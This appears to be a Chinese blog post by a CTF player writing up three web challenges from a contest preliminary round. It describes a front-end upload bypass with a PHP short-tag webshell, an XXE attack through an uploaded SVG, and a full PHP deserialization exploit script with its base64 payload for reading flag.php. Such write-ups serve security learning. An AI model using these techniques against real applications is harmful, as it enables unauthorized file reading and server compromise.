Author:endowment
这次预赛没打好,只有850分,不知道能不能进😫😫,先看看web题目:
Upload1
主要考察前端绕过吧,然后短标签绕过
这边成功绕过前端,可以上传php文件,然后一句话,提示:你也配用php,只能用短标签
然后访问文件:
EzSerialize
主要考察php反序列化,反正链子很简单:
JavaScript
User::__toString()->Admin::__call()->FileReader::execute()
exp:
<?php
class User {
private $name;
private $role;
public function __construct($name, $role) {
$this->name = $name;
$this->role = $role;
}
}
class Admin {
private $command;
public function __construct($command) {
$this->command = $command;
}
}
class FileReader {
private $filename;
public function __construct($filename) {
$this->filename = $filename;
}
}
$user = new User('test', new Admin(new FileReader('flag.php')));
$serialized = serialize($user);
echo base64_encode($serialized);
//Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjQ6InRlc3QiO3M6MTA6IgBVc2VyAHJvbGUiO086NToiQWRtaW4iOjE6e3M6MTQ6IgBBZG1pbgBjb21tYW5kIjtPOjEwOiJGaWxlUmVhZGVyIjoxOntzOjIwOiIARmlsZVJlYWRlcgBmaWxlbmFtZSI7czo4OiJmbGFnLnBocCI7fX19
UploadKing
一个上传界面,我最开始以为是nginx系统解析漏洞,判断后缀名是不是白名单,然后我又尝试了.user.ini,发现也不行,上传界面给了提示说:SVG,webp等文件可以通过,然后尝试上传a.svg文件,上传成功并且可以查看,然后配合上xml,打XXE漏洞
然后查看文件
感谢各位师傅们的观看,谢谢大家😘
好消息:进决赛了,感谢队友的付出😎
丁神牛逼